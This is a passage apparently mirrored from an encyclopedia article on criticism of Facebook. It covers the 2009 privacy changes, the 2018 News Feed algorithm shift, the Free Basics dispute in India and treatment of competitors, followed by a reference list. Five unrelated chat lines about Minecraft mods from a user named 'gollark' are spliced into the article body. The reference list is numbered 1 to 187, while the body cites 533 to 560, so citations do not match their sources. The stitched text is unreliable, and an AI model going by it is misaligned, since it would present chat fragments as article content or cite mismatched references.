The change was described by Ryan Tate as Facebook's Great Betrayal,[534] forcing user profile photos and friends lists to be visible in users' public listing, even for users who had explicitly chosen to hide this information previously,[533] and making photos and personal information public unless users were proactive about limiting access.[535] For example, a user whose "Family and Relationships" information was set to be viewable by "Friends Only" would default to being viewable by "Everyone" (publicly viewable). That is, information such as the gender of the partner the user is interested in, relationship status, and family relations became viewable to those even without a Facebook account. Facebook was heavily criticized[536] for both reducing its users' privacy and pushing users to remove privacy protections. Groups criticizing the changes include the Electronic Frontier Foundation[533] and American Civil Liberties Union.[537] Mark Zuckerberg, CEO, had hundreds of personal photos and his events calendar exposed in the transition.[538] Facebook has since re-included an option to hide friends lists from being viewable; however, this preference is no longer listed with other privacy settings, and the former ability to hide the friends list from selected people among one's own friends is no longer possible.[539] Journalist Dan Gillmor deleted his Facebook account over the changes, stating he "can't entirely trust Facebook"[540] and Heidi Moore at Slate's Big Money temporarily deactivated her account as a "conscientious objection".[541] Other journalists have been similarly disappointed and outraged by the changes.[534] Defending the changes, founder Mark Zuckerberg said "we decided that these would be the social norms now and we just went for it".[542] The Office of the Privacy Commissioner of Canada launched another investigation into Facebook's privacy policies after complaints following the change.[543]

January 2018

Following a difficult 2017, marked by accusations of relaying Fake news and revelations about groups close to Russia which tried to influence the 2016 US presidential election (see Russian interference in the 2016 United States elections) via advertisements on his service, Mark Zuckerberg, announced in his traditional January post:

“We're making a major change to how we build Facebook. I'm changing the goal I give our product teams from focusing on helping you find relevant content to helping you have more meaningful social interactions”.

Mark Zuckerberg

Following surveys on Facebook users,[544] this desire for change will take the form of a reconfiguration of the News Feed algorithms to:

  • Prioritize content of family members and friends (Mark Zuckerberg January 12, Facebook:[545] “The first changes you'll see will be in News Feed, where you can expect to see more from your friends, family and groups”.)
  • Give priority to news articles from local sources considered more credible

The recent changes of the News Feed algorithm[545] (see content : News Feed#History) are expected to improve “the amount of meaningful content viewed”.[546] To this end, the new algorithm is supposed to determine the publications around which a user is most likely to interact with his friends, and make them appear higher in the News Feed instead of items for example from media companies or brands. These are posts “that inspire back-and-forth discussion in the comments and posts that you might want to share and react to”.[547] But, as even Mark Zuckerberg admitted,[545] he “expect the time people spend on Facebook and some measures of engagement will go down. But I also expect the time you do spend on Facebook will be more valuable”. The less public content a Facebook user sees on their News Feed, the less brands are able to reach consumers. That’s unarguably a major lose for advertisers[548] and publishers.

This change which seems to be just another update of the social network, is widely criticized because of the heavy consequences it might lead to “In countries such as the Philippines, Myanmar and South Sudan and emerging democracies such Bolivia and Serbia, it is not ethical to plead platform neutrality or to set up the promise of a functioning news ecosystem and then simply withdraw at a whim”.[549] Indeed, in such countries, Facebook was the promise of a reliable and objective platform on which they could hope for raw information. Independent media companies tried to fight censorship through their articles and were promoting in a way the right for citizens to know what is going on in their countries.

The company’s way of handling scandals and criticism over fake news by diminishing its media company image is even defined as “potentially deadly”[549] regarding the poor and fraught political environments like Myanmar or South Sudan appealed by the “free basics” programme of the social network. Serbian journalist Stevan Dojcinovic goes further by describing Facebook as a “monster” and accuses the company of “showing a cynical lack of concern for how its decisions affect the most vulnerable”.[550] Indeed, Facebook had experimented with withdrawing media companies’ news on user’s newsfeed in few countries such as Serbia. Stevan Docjcinovic then wrote an article explaining how Facebook helped them “to bypass mainstream channels and bring [their] stories to hundreds of thousands of readers”.[550] The rule about publishers is not being applied to paid posts raising the journalist’s fears about the social network “becoming just another playground for the powerful”[550] by letting them for example buy Facebook ads. Critics are also visible in other media companies depicting the private company as the “destroyer of worlds”. LittleThings CEO, Joe Speiser states that the algorithm shift “took out roughly 75% of LittleThings" organic traffic while hammering its profit margins”[551] compelling them to close their doors because they were relying on Facebook to share content.

Net neutrality

"Free basics" controversy in India

In February 2016, TRAI ruled against differential data pricing for limited services from mobile phone operators effectively ending zero-rating platforms in India. Zero rating provides access to a limited number of websites for no charge to the end user. Net-neutrality supporters from India (SaveTheInternet.in) brought out the negative implications of the Facebook Free Basic program and spread awareness to the public.[552] Facebook's Free Basics program[553] was a collaboration with Reliance Communications to launch Free Basics in India. The TRAI ruling against differential pricing marked the end of Free Basics in India.[554]

Earlier, Facebook had spent $44 million USD in advertising and it implored all of its Indian users to send an email to the Telecom Regulatory Authority to support its program.[555] TRAI later asked Facebook to provide specific responses from the supporters of Free Basics.[556][557]

Treatment of potential competitors

In December 2018 details on Facebook's behavior against competitors surfaced. The UK parliament member Damian Collins released files from a court ruling between Six4Three and Facebook. According to those files, the social media company Twitter released its app Vine in 2013. Facebook blocked Vine's Access to its data.[558]

In July 2020, Facebook along with other tech giants Apple, Amazon and Google were accused of maintaining harmful power and anti-competitive strategies to quash potential competitors in the market.[559] The CEOs of respective firms appeared in a teleconference on 29 July 2020 before the lawmakers of the United States Congress.[560]

gollark: ... why forge 1.13?
gollark: While many didn't, I actually *liked* the weird hexagon minigame TC4 had.
gollark: The 1.8 one is Thaumcraft 5 which nobody used much.
gollark: No, the 1.7 version.
gollark: Unrelated: trying to make a nice base, so I made this 70-block-tall staircase, but now I want something to put at the top and am being indecisive again.

See also

References

  1. Duncan, Geoff (June 17, 2010). "Open letter urges Facebook to strengthen privacy". Digital Trends. Retrieved June 3, 2017.
  2. Paul, Ian (June 17, 2010). "Advocacy Groups Ask Facebook for More Privacy Changes". PC World. International Data Group. Retrieved June 3, 2017.
  3. Aspen, Maria (February 11, 2008). "How Sticky Is Membership on Facebook? Just Try Breaking Free". The New York Times. Retrieved June 3, 2017.
  4. Anthony, Sebastian (March 19, 2014). "Facebook's facial recognition software is now as accurate as the human brain, but what now?". ExtremeTech. Ziff Davis. Retrieved June 3, 2017.
  5. Gannes, Liz (June 8, 2011). "Facebook facial recognition prompts EU privacy probe". CNET. CBS Interactive. Retrieved June 3, 2017.
  6. Friedman, Matt (March 21, 2013). "Bill to ban companies from asking about job candidates' Facebook accounts is headed to governor". NJ.com. Advance Digital. Retrieved June 3, 2017.
  7. "How Facebook Breeds Jealousy". Seeker. Group Nine Media. February 10, 2010. Retrieved June 3, 2017.
  8. Matyszczyk, Chris (August 11, 2009). "Study: Facebook makes lovers jealous". CNET. CBS Interactive. Retrieved June 3, 2017.
  9. Ngak, Chenda (November 27, 2012). "Facebook may cause stress, study says". CBS News. CBS Interactive. Retrieved June 3, 2017.
  10. Smith, Dave (November 13, 2015). "Quitting Facebook will make you happier and less stressed, study says". Business Insider. Axel Springer SE. Retrieved June 3, 2017.
  11. Bugeja, Michael J. (January 23, 2006). "Facing the Facebook". The Chronicle of Higher Education. Archived from the original on February 20, 2008. Retrieved June 3, 2017.
  12. Hough, Andrew (April 8, 2011). "Student 'addiction' to technology 'similar to drug cravings', study finds". The Telegraph. Telegraph Media Group. Retrieved June 3, 2017.
  13. "Facebook and Twitter 'more addictive than tobacco and alcohol'". The Telegraph. Telegraph Media Group. February 1, 2012. Retrieved June 3, 2017.
  14. Wauters, Robin (September 16, 2010). "Greenpeace Slams Zuckerberg For Making Facebook A "So Coal Network" (Video)". TechCrunch. AOL. Retrieved June 3, 2017.
  15. Neate, Rupert (December 23, 2012). "Facebook paid £2.9m tax on £840m profits made outside US, figures show". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  16. Grinberg, Emanuella (September 18, 2014). "Facebook 'real name' policy stirs questions around identity". CNN. Retrieved June 3, 2017.
  17. Doshi, Vidhi (July 19, 2016). "Facebook under fire for 'censoring' Kashmir-related posts and accounts". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  18. Arrington, Michael (November 22, 2007). "Is Facebook Really Censoring Search When It Suits Them?". TechCrunch. AOL. Retrieved June 3, 2017.
  19. Wong, Julia Carrie (March 18, 2019). "The Cambridge Analytica scandal changed the world – but it didn't change Facebook". The Guardian. Retrieved May 2, 2019.
  20. Greenwald, Glenn; MacAskill, Ewen (June 7, 2013). "NSA Prism program taps in to user data of Apple, Google and others". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  21. Setalvad, Ariha (August 7, 2015). "Why Facebook's video theft problem can't last". The Verge. Vox Media. Retrieved June 3, 2017.
  22. "Facebook, Twitter and Google grilled by MPs over hate speech". BBC News. BBC. March 14, 2017. Retrieved June 3, 2017.
  23. Toor, Amar (September 15, 2015). "Facebook will work with Germany to combat anti-refugee hate speech". The Verge. Vox Media. Retrieved June 3, 2017.
  24. Sherwell, Philip (October 16, 2011). "Cyber anarchists blamed for unleashing a series of Facebook 'rape pages'". The Telegraph. Telegraph Media Group. Retrieved June 3, 2017.
  25. "20,000 Israelis sue Facebook for ignoring Palestinian incitement". The Times of Israel. October 27, 2015. Retrieved June 3, 2017.
  26. "Israel: Facebook's Zuckerberg has blood of slain Israeli teen on his hands". The Times of Israel. July 2, 2016. Retrieved June 3, 2017.
  27. Burke, Samuel (November 19, 2016). "Zuckerberg: Facebook will develop tools to fight fake news". CNN. Retrieved June 3, 2017.
  28. "Hillary Clinton says Facebook 'must prevent fake news from creating a new reality'". The Telegraph. Telegraph Media Group. June 1, 2017. Retrieved June 3, 2017.
  29. Fiegerman, Seth (May 9, 2017). "Facebook's global fight against fake news". CNN. Retrieved June 3, 2017.
  30. Grinberg, Emanuella; Said, Samira (March 22, 2017). "Police: At least 40 people watched teen's sexual assault on Facebook Live". CNN. Retrieved June 3, 2017.
  31. Grinberg, Emanuella (January 5, 2017). "Chicago torture: Facebook Live video leads to 4 arrests". CNN. Retrieved June 3, 2017.
  32. Sulleyman, Aatif (April 27, 2017). "Facebook Live killings: Why the criticism has been harsh". The Independent. Retrieved June 3, 2017.
  33. Farivar, Cyrus (January 7, 2016). "Appeals court upholds deal allowing kids' images in Facebook ads". Ars Technica. Condé Nast. Retrieved June 3, 2017.
  34. Levine, Dan; Oreskovic, Alexei (March 12, 2012). "Yahoo sues Facebook for infringing 10 patents". Reuters. Thomson Reuters. Retrieved June 3, 2017.
  35. Wagner, Kurt (February 1, 2017). "Facebook lost its Oculus lawsuit and has to pay $500 million". Recode. Vox Media. Retrieved June 3, 2017.
  36. Brandom, Rusell (May 19, 2016). "Lawsuit claims Facebook illegally scanned private messages". The Verge. Vox Media. Retrieved June 3, 2017.
  37. Tryhorn, Chris (July 25, 2007). "Facebook in court over ownership". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  38. Michels, Scott (July 20, 2007). "Facebook Founder Accused of Stealing Idea for Site". ABC News. ABC. Retrieved June 3, 2017.
  39. Carlson, Nicholas (March 5, 2010). "How Mark Zuckerberg Hacked Into Rival ConnectU In 2004". Business Insider. Axel Springer SE. Retrieved June 3, 2017.
  40. Arthur, Charles (February 12, 2009). "Facebook paid up to $65m to founder Mark Zuckerberg's ex-classmates". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  41. Singel, Ryan (April 11, 2011). "Court Tells Winklevoss Twins to Quit Their Facebook Whining". Wired. Condé Nast. Retrieved June 3, 2017.
  42. Stempel, Jonathan (July 22, 2011). "Facebook wins dismissal of second Winklevoss case". Reuters. Thomson Reuters. Retrieved June 3, 2017.
  43. Oweis, Khaled Yacoub (November 23, 2007). "Syria blocks Facebook in Internet crackdown". Reuters. Thomson Reuters. Retrieved June 3, 2017.
  44. Wauters, Robin (July 7, 2009). "China Blocks Access To Twitter, Facebook After Riots". TechCrunch. AOL. Retrieved June 3, 2017.
  45. "Iranian government blocks Facebook access". The Guardian. Guardian Media Group. May 24, 2009. Retrieved June 3, 2017.
  46. Frier, Sarah (August 13, 2019). "Facebook Paid Contractors to Transcribe Users' Audio Chats". Bloomberg News.
  47. "Facebook paid hundreds of contractors to transcribe users' audio". Los Angeles Times. August 13, 2019. Retrieved May 8, 2020.
  48. Haselton, Todd (August 13, 2019). "Facebook hired people to transcribe voice calls made on Messenger". CNBC. Retrieved May 8, 2020.
  49. "A Handy Facebook-to-English Translator | Electronic Frontier Foundation". Eff.org. April 28, 2010. Retrieved June 11, 2013.
  50. "Zuckerberg family pic stirs Facebook privacy debate". CBS News. CBS Interactive. December 27, 2012. Retrieved June 4, 2012.
  51. Hoffman, Harrison (August 12, 2007). "Facebook's source code goes public". CNET News.com.
  52. Richards, Jonathan (August 14, 2007). "Facebook Source Code Leaked Onto Internet". Fox News Channel. Archived from the original on May 29, 2013. Retrieved August 21, 2007.
  53. "Facebook's PHP leak SNAFU". Szinf.com. July 6, 2015. Archived from the original on July 7, 2015. Retrieved July 6, 2015.
  54. Cubrilovic, Nik (August 11, 2007). "Facebook Source Code Leaked". TechCrunch.com.
  55. Ortutay, Barbara (September 21, 2009). "Facebook to end Beacon tracking tool in settlement". USA Today. Retrieved December 8, 2010.
  56. Henry Blodget (December 1, 2007). "NYT: Facebook's Zuckerberg Misled Us; Coke: Ditto - Silicon Alley Insider". Alleyinsider.com. Archived from the original on January 31, 2009. Retrieved June 11, 2013.
  57. Stefan Berteau (November 29, 2007). "Facebook's Misrepresentation of Beacon's Threat to Privacy: Tracking users who opt out or are not logged in". CA Security Advisor Research Blog. Archived from the original on December 17, 2007. Retrieved December 24, 2007.
  58. Stefan Berteau (November 30, 2007). "Update: A Statement From Facebook". CA Security Advisor Research Blog. Archived from the original on November 28, 2010. Retrieved December 8, 2010.
  59. Rosmarin, Rachel (September 5, 2006). "Facebook's Makeover". Forbes. Archived from the original on October 5, 2006. Retrieved April 29, 2015.
  60. "Facebook CEO: 'We Really Messed This One Up'". NBC11.com. September 8, 2006. Archived from the original on January 28, 2007. Retrieved February 21, 2007.
  61. Kirkpatrick, David (2010). The Facebook Effect: The Inside Story of the Company That Is Connecting the World. New York City: Simon & Schuster. p. 191. ISBN 978-1-4391-0211-4.
  62. Jesdanun, Anick (2006). "Facebook offers new privacy options". Associated Press. Archived from the original on December 13, 2010. Retrieved September 8, 2006.
  63. "Making Control Simple". Retrieved December 8, 2010.
  64. "Controlling How You Share". Retrieved December 8, 2010.
  65. "John Lynch & Jenny Ellickson, U.S. Dept. of Justice, Computer Crime and Intellectual Property Section, Obtaining and Using Evidence from Social Networking Sites: Facebook, MySpace, LinkedIn, and more" (PDF). Retrieved June 11, 2013.
  66. Junichi P. Semitsu (2011). "From Facebook to Mug Shot: How the Dearth of Social Networking Privacy Rights Revolutionized Online Government Surveillance". Pace Law Review. 31 (1).
  67. "Rapport over verzoeken tot gegevensverstrekking van internationale overheden". Facebook. Retrieved on September 4, 2013.
  68. "ap.google.com, Canada launches privacy probe into Facebook". Archived from the original on June 3, 2008.
  69. "Privacy Commissioner's Findings in the case of CIPPIC against Facebook" (PDF). Retrieved January 15, 2010.
  70. Jones, Harvey & Soltren, José Hiram (2005). "Facebook: Threats to Privacy" (PDF). Cambridge, Massachusetts: MIT (MIT 6.805/STS085: Ethics and Law on the Electronic Frontier - Fall 2005). Cite journal requires |journal= (help) (PDF)
  71. "Facebook Security Response". TheIndyChannel.com. Archived from the original on April 17, 2012. Retrieved December 8, 2010.
  72. Peterson, Chris (February 13, 2006). "Who's Reading Your Facebook?". The Virginia Informer.
  73. "Facebook Privacy Policy". Retrieved December 8, 2010.
  74. Buckley, Christine (August 30, 2007). "Get a life and allow your staff to use Facebook, TUC tells bosses". The Times. London. Retrieved March 5, 2008.
  75. "Facebook Opens Profiles to Public". BBC Online. September 7, 2007.
  76. "Facebook security". BBC. October 24, 2007. Archived from the original on February 20, 2008. Retrieved March 5, 2008.
  77. "Controlling How You Share". Retrieved December 8, 2010.
  78. Aspan, Maria (February 11, 2008). "How Sticky Is Membership on Facebook? Just Try Breaking Free". The New York Times. Retrieved September 23, 2014.
  79. "Information we receive about you". Facebook. Retrieved June 11, 2013.
  80. Lunden, Ingrid (October 13, 2013). "Facebook Buys Mobile Data Analytics Company Onavo, Reportedly For Up To $200M… And (Finally?) Gets Its Office In Israel". TechCrunch.
  81. Morris, Betsy; Seetharaman, Deepa (August 9, 2017). "The New Copycats: How Facebook Squashes Competition From Startups". Wall Street Journal. ISSN 0099-9660. Retrieved August 15, 2017.
  82. "The New Copycats: How Facebook Squashes -2-". Fox Business. August 9, 2017. Retrieved August 15, 2017.
  83. "Facebook knew about Snap's struggles months before the public". Engadget. Retrieved August 15, 2017.
  84. Perez, Sarah. "Facebook is pushing its data-tracking Onavo VPN within its main mobile app". TechCrunch. Retrieved February 14, 2018.
  85. "Facebook's Protect security feature is essentially Spyware". IT PRO. Retrieved February 14, 2018.
  86. "Apple removed Facebook's Onavo from the App Store for gathering app data". TechCrunch. Retrieved August 23, 2018.
  87. "Facebook will pull its data-collecting VPN app from the App Store over privacy concerns". The Verge. Retrieved August 23, 2018.
  88. Grothaus, Michael (August 23, 2018). "Apple makes Facebook pull its spyware(ish) VPN from the App Store". Fast Company. Retrieved September 3, 2018.
  89. Newton, Casey (January 30, 2019). "Facebook will shut down its controversial market research app for iOS". The Verge. Retrieved January 30, 2019.
  90. Constine, John (January 29, 2019). "Facebook pays teens to install VPN that spies on them". TechCrunch. Retrieved January 30, 2019.
  91. Wagner, Kurt (January 30, 2019). "Apple says it's banning Facebook's research app that collects users' personal information". Recode. Retrieved January 30, 2019.
  92. Warren, Tom (January 30, 2019). "Apple blocks Facebook from running its internal iOS apps". The Verge. Retrieved January 30, 2019.
  93. Isaac, Mike (January 31, 2019). "Apple Shows Facebook Who Has the Power in an App Dispute". The New York Times. ISSN 0362-4331. Retrieved February 2, 2019.
  94. Constine, Josh (January 30, 2019). "Senator Warner calls on Zuckerberg to support market research consent rules". TechCrunch. Retrieved January 31, 2019.
  95. Lapowsky, Issie (January 30, 2019). "By Defying Apple's Rules, Facebook Shows It Never Learns". Wired.com. ISSN 1059-1028. Retrieved January 31, 2019.
  96. "Net generation grieves with Facebook postings". News Observer. Archived from the original on August 20, 2007. Retrieved March 5, 2008.
  97. Batista, Sarah (November 21, 2005). "UVA Student Remembered". Charlottesville Newsplex. Archived from the original on January 19, 2008. Retrieved April 10, 2006.CS1 maint: BOT: original-url status unknown (link)
  98. Bernhard, Stephanie (January 25, 2006). "Community mourns death of Pagan '06". Brown Daily Herald. Retrieved April 10, 2006.
  99. Kelleher, Kristina (February 22, 2007). "Facebook profiles become makeshift memorials". The Brown Daily Herald. Archived from the original on March 21, 2008. Retrieved March 5, 2008.
  100. Hortobagyi, Monica (May 8, 2007). "USA Today article". USA Today. Retrieved April 30, 2010.
  101. Drudi, Cassandra (January 5, 2008). "Facebook proves problematic for police". The Globe and Mail. Toronto. Retrieved March 5, 2008.
  102. "Angry Facebook Users Illegally Leaked the Names of Accused Underage Murderers". Digital Journal. January 5, 2008. Retrieved March 5, 2008.
  103. "Defacing Facebook". July 27, 2007. Retrieved August 17, 2007.
  104. Paul, Ian (May 31, 2010). "It's Quit Facebook Day, Are You Leaving? - PCWorld". PC World. Retrieved May 31, 2010.
  105. Woollacott, Emma (May 31, 2010). "Quit Facebook Day set to be a flop". TG Daily. Retrieved May 31, 2010.
  106. Jemima Kiss (June 1, 2010). "Facebook: Did anyone really quit?". Guardian. London.
  107. Stieger, Stefan; Burger, Christoph; Bohn, Manuel; Voracek, Martin (2013). "Who Commits Virtual Identity Suicide? Differences in Privacy Concerns, Internet Addiction, and Personality Between Facebook Users and Quitters". Cyberpsychology, Behavior, and Social Networking. 16 (9): 629–634. doi:10.1089/cyber.2012.0323. PMID 23374170.(subscription required)
  108. "Facebook's facial recognition software is now as accurate as the human brain, but what now? | ExtremeTech". Extremetech.com. Retrieved June 13, 2014.
  109. Facebook Taking Hits Over Facial Recognition Feature. Washington: Atlantic Media, Inc., 2011. ProQuest. Web. December 6, 2016.
  110. "Facebook facial recognition raises eyebrows in Germany, EU". Deutsche Welle. Retrieved June 13, 2011.
  111. Milian, Mark. "Facebook lets users opt out of facial recognition". CNN International. Retrieved June 13, 2011.
  112. Gannes, Liz. "Facebook facial recognition prompts EU privacy probe". Cnet News. Retrieved June 13, 2011.
  113. "Facebook's Facial Recognition Software Is Different From The FBI's. Here's Why". NPR.org. Retrieved December 16, 2018.
  114. Computer, Express. "Facebooks' Mark Zuckerberg: 'we should Not be Afraid of AI'." Express Computer (2016) ProQuest. Web. December 6, 2016.
  115. "Was Facebook über User weiß". Orf.at. November 27, 2011. Retrieved June 11, 2013.
  116. "Sound file" (MP£). Europe-v-facebook.org. Retrieved December 16, 2018.
  117. "An Coimisineir Cosanta Sonrai (Data Protection Commissioner) letter" (PDF). August 24, 2011. Retrieved June 13, 2014.
  118. Drucker, Jesse (October 21, 2010). "Google 2.4% Rate Shows How $60 Billion Lost to Tax Loopholes - Bloomberg". www.bloomberg.com. Retrieved May 21, 2013.
  119. "Facebook's Data Pool". Europe-v-facebook.org.
  120. "Removed content" (PDF). August 22, 2011. Retrieved June 13, 2014.
  121. "Facebook Data Categories" (PDF). April 3, 2012. Retrieved June 13, 2014.
  122. "Legal Procedure against "Facebook Ireland Limited"". Europe-v-facebook.org.
  123. "Facebook won't 'like' its 17th complaint". Irish Examiner. August 27, 2011. Retrieved June 11, 2013.
  124. "Our-Policy.org - Annuity Payments Policies and Regulations". Our-policy.org. Archived from the original on May 25, 2018. Retrieved March 24, 2018.
  125. "Europe versus Facebook". Europe-v-facebook.org. Retrieved June 11, 2013.
  126. Achohido, Byron (November 15, 2011). "Facebook tracking is under scrutiny". USA Today. Gannett Company. Archived from the original on November 16, 2011. Retrieved June 18, 2017.
  127. "Belgian court orders Facebook to stop tracking non-members". The Guardian. Guardian Media Group. November 10, 2015. Retrieved June 18, 2017.
  128. Baraniuk, Chris (December 2, 2015). "Facebook bows to Belgian privacy ruling over cookies". BBC News. BBC. Retrieved June 18, 2017.
  129. Statt, Nick (December 2, 2015). "After privacy ruling, Facebook now requires Belgium users to log in to view pages". The Verge. Vox Media. Retrieved June 18, 2017.
  130. Anson, Alexander (November 12, 2012). "Facebook Stalking Statistics 2012". ansonalex.com. Anson, Alexander. Retrieved October 26, 2014.
  131. "Stalking Statistics". Violence Prevention and Action Center. John Carroll University. Retrieved October 26, 2014.
  132. Westlake, E. J. (2008), "Friend Me if You Facebook: Generation Y and Performative Surveillance", The Drama Review, 52 (4): 21–40, doi:10.1162/dram.2008.52.4.21
  133. Steel, Emily; Fowler, Geoffrey A. (October 18, 2010). "Facebook in Privacy Breach". The Wall Street Journal. Dow Jones & Company. Retrieved June 4, 2017.
  134. Takahashi, Dean (October 17, 2010). "WSJ reports Facebook apps — including banned LOLapps games — transmitted private user data". VentureBeat. Retrieved June 4, 2017.
  135. "Suspending Cambridge Analytica and SCL Group from Facebook | Facebook Newsroom". Retrieved March 20, 2018.
  136. "How Facebook Made Its Cambridge Analytica Data Crisis Even Worse". Bloomberg.com. March 20, 2018. Retrieved March 20, 2018.
  137. "Academic behind Facebook breach says political influence was..." Reuters. March 21, 2018. Retrieved March 21, 2018.
  138. Solon, Olivia (April 4, 2018). "Facebook says Cambridge Analytica may have gained 37m more users' data". the Guardian. Retrieved April 6, 2018.
  139. Wong, Julia Carrie (March 23, 2018). "Elon Musk joins #DeleteFacebook effort as Tesla and SpaceX pages vanish". theguardian.com. Retrieved March 24, 2018.
  140. Green, Dr. Jemma. "#DeleteFacebook Highlights The Benefits Of Blockchain". forbes.com. Retrieved March 24, 2018.
  141. Grind, Kirsten (March 22, 2018). "Next Worry for Facebook: Disenchanted Users". Wsj.com. Retrieved March 25, 2018.
  142. Tobias, Manuela (March 22, 2018). "Comparing Facebook data use by Obama, Cambridge Analytica". PolitiFact. Retrieved May 2, 2018.
  143. Schouten, Fredreka (March 20, 2018). "Obama 2012 team: We didn't break Facebook rules in our campaign". USA Today. Retrieved May 2, 2018.
  144. Rogers, James (March 20, 2018). "Obama 2012 campaign 'sucked' data from Facebook, former official says". Fox News. Retrieved May 2, 2018.
  145. Sullivan, Mark (March 20, 2018). "Obama Campaign's "Targeted Share" App Also Used Facebook Data From Millions Of Unknowing Users". Fast Company. Retrieved May 2, 2018.
  146. Rutenberg, Jim (June 20, 2013). "The Obama Campaign's Digital Masterminds Cash In". The New York Times. Retrieved May 2, 2018.
  147. Friedman, Matt (March 21, 2013). "Bill to ban companies from asking about job candidates' Facebook accounts is headed to governor". NJ.com. Advance Digital. Retrieved June 8, 2017.
  148. N. Landers, Richard (2016). Social Media in Employee Selection and Recruitment: theory, practice, and current challenges. Switzerland: Springer international publishing. pp. 19–20. ISBN 9783319299891.
  149. "Fourth Amendment Activities". uscourts.gov. Retrieved March 24, 2018.
  150. Dave., Awl (2011). Facebook me! : a guide to socializing, sharing, and promoting on Facebook (2nd ed.). Berkeley, CA: Peachpit Press. ISBN 9780321743732. OCLC 699044722.
  151. "Why Parents Help Their Children Lie to Facebook About Age: Unintended Consequences of the Children's Online Privacy Protection Act". Journalist's Resource.org.
  152. Schweitzer, Sarah (October 6, 2005). "Fisher College expels student over website entries". The Boston Globe.
  153. O'Toole, Catie (January 24, 2010). "Seventh-grade North Syracuse student suspended, 25 others disciplined for Facebook page about teacher". The Post-Standard. Retrieved January 25, 2010.
  154. Peluchette, Joy; Karl, Katherine (2010). "Examining Students' Intended Image on Facebook: "what were they Thinking?!"". Journal of Education for Business. 85 (1): 30–7. doi:10.1080/08832320903217606.
  155. Bugeja, Michael (January 3, 2006). "Facing the Facebook". The Chronicle of Higher Education. Archived from the original on February 20, 2008. Retrieved October 6, 2006.
  156. Bugeja, Michael J. (January 26, 2007). "Distractions in the Wireless Classroom". Chronicle Careers. The Chronicle of Higher Education. Retrieved June 26, 2007.
  157. National Association of Campus Activities (July 12, 2006). "Facing the Facebook". Archived from the original on June 27, 2006. Retrieved October 6, 2006.
  158. Association for Education in Journalism and Communication (2006). "Facing the Facebook: Administrative Issues Involving Social Networks". Archived from the original on October 8, 2007. Retrieved October 6, 2006.
  159. EDUCAUSE Learning Institute (2006). "7 Things You Should Know About Facebook". Archived from the original on September 16, 2006. Retrieved October 6, 2006.
  160. Junco, R (2012). "Too much face and not enough books: The relationship between multiple indices of Facebook use and academic performance" (PDF). Computers in Human Behavior. 28 (1): 187–198. doi:10.1016/j.chb.2011.08.026.
  161. Junco, R (2012). "The relationship between frequency of Facebook use, participation in Facebook activities, and student engagement" (PDF). Computers & Education. 58 (1): 162–171. doi:10.1016/j.compedu.2011.08.004.
  162. Heiberger, Greg and Harper, Ruth (2008). Have you Facebooked Astin lately? In Reynol Junco and Dianne M. Timm (Eds). Using Emerging Technologies to Enhance Student Engagement. San Francisco: Jossey-Bass.
  163. Cotten, Shelia R. (2008). Students' technology use and the impacts on well-being. In Reynol Junco and Dianne M. Timm (Eds). Using Emerging Technologies to Enhance Student Engagement. San Francisco: Jossey-Bass.
  164. Kirschner, P. A.; Karpinski, A. C. (2010). "Facebook and academic performance". Computers in Human Behavior. 26 (6): 1237–1245. doi:10.1016/j.chb.2010.03.024. hdl:10818/20216. Archived from the original on December 27, 2011. Retrieved October 31, 2017.
  165. Kolek, E. A., & Saunders, D. (2008). Online disclosure: An empirical examination of undergraduate Facebook profiles. NASPA Journal, 45(1), 1–25.
  166. Hargittai, Eszter; More, Eian; Pasek, Josh (April 26, 2009). "Facebook and academic performance: Reconciling a media sensation with data". First Monday. 14 (5). doi:10.5210/fm.v14i5.2498. Retrieved January 30, 2019.
  167. Hern, Alex (December 14, 2018). "Facebook admits bug allowed apps to see hidden photos". Theguardian.com. Retrieved December 15, 2018.
  168. Dance, Gabriel J. X.; LaForgia, Michael; Confessore, Nicholas (December 18, 2018). "As Facebook Raised a Privacy Wall, It Carved an Opening for Tech Giants". Nytimes.com.
  169. Hern, Alex (December 19, 2018). "Facebook users cannot avoid location-based ads, investigation finds". Theguardian.com.
  170. "Say No To The Dress". BuzzFeed News. Retrieved January 22, 2019.
  171. "Facebook reportedly received users' sensitive health data from apps: "It's incredibly dishonest"". Cbsnews.com. Retrieved February 23, 2019.
  172. Doward, Jamie; Soni, Raj (February 23, 2019). "Facebook attacked over app that reveals period dates of its users". Theguardian.com. Retrieved February 23, 2019.
  173. Schechner, Sam; Secada, Mark (February 22, 2019). "You Give Apps Sensitive Personal Information. Then They Tell Facebook". Wsj.com. Retrieved February 23, 2019.
  174. Statt, Nick (February 22, 2019). "App makers are sharing sensitive personal information with Facebook but not telling users". The Verge. Retrieved February 23, 2019.
  175. Reuters (February 23, 2019). "'Outrageous abuse of privacy': New York orders inquiry into Facebook data use". Theguardian.com. Retrieved February 23, 2019.
  176. "Revealed: Facebook's global lobbying against data privacy laws - Technology - The Guardian". March 2, 2019. Archived from the original on March 2, 2019. Retrieved March 3, 2019.
  177. Laura Kayali (January 29, 2019). "Inside Facebook's fight against European regulation". politico.eu. Retrieved May 3, 2019.
  178. "Facebook Stored Millions of Passwords in Plaintext—Change Yours Now". Wired.com. March 21, 2019. Retrieved March 23, 2019.
  179. Hern, Alex (March 21, 2019). "Facebook stored hundreds of millions of passwords unprotected". the Guardian. Retrieved March 22, 2019.
  180. "Facebook now says its password leak affected 'millions' of Instagram users". TechCrunch. April 18, 2019. Retrieved April 18, 2019.
  181. "Hungary competition authority fines Facebook $4 million". The Seattle Times. December 6, 2019. Retrieved December 14, 2019.
  182. "Is Facebook listening to me? Why those ads appear after you talk about things". USA TODAY. June 28, 2019. Retrieved June 28, 2019.
  183. "Facebook isn't secretly listening to your conversations, but the truth is much more disturbing". NEWS ATLAS. September 6, 2019. Retrieved September 6, 2019.
  184. Hough, Andrew (April 8, 2011). "Student 'addiction' to technology 'similar to drug cravings', study finds". London: Telegraph Media Group.
  185. "Facebook and Twitter 'more addictive than tobacco and alcohol'". London: Telegraph Media Group. February 1, 2012.
  186. Edwards, Ashton (August 1, 2014). "Facebook goes down for 30 minutes, 911 calls pour in". Fox13. Retrieved August 2, 2016.
  187. Lenhart, Amanda (April 9, 2015). "Teens, Social Media & Technology Overview 2015". Pew Research Center. Retrieved July 8, 2020.
